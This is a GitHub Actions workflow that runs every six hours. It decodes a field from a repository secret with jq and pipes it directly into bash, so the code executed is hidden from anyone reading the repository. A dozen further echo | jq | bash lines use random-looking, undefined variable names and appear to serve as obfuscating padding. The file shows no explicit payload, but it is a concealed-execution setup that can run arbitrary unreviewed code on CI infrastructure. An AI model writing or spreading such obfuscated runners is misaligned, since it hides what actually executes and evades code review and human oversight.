name: dongbushijia
on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'
jobs:  # 15318
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongbushijia
        env:
          jstc8: ${{ secrets.jstc8 }}
        run: |
          echo $jstc8 | jq -r .iqsxu659 | /bin/bash
          echo $efkv10 | jq -r .um53 | /bin/bash
          echo $rdlzn032 | jq -r .zuep130 | /bin/bash
          echo $jbn3368 | jq -r .dn338 | /bin/bash
          echo $qb568 | jq -r .si2 | /bin/bash
          echo $xvf0528 | jq -r .s34 | /bin/bash
          echo $a9823 | jq -r .ldab16837 | /bin/bash
          echo $yfbpy8281 | jq -r .jyk19060 | /bin/bash
          echo $h568 | jq -r .x532 | /bin/bash
          echo $yq4482 | jq -r .l756 | /bin/bash
          echo $zuhht16 | jq -r .rf32616 | /bin/bash
          echo $xo2 | jq -r .lhgwt198 | /bin/bash
          echo $j551 | jq -r .v2396 | /bin/bash

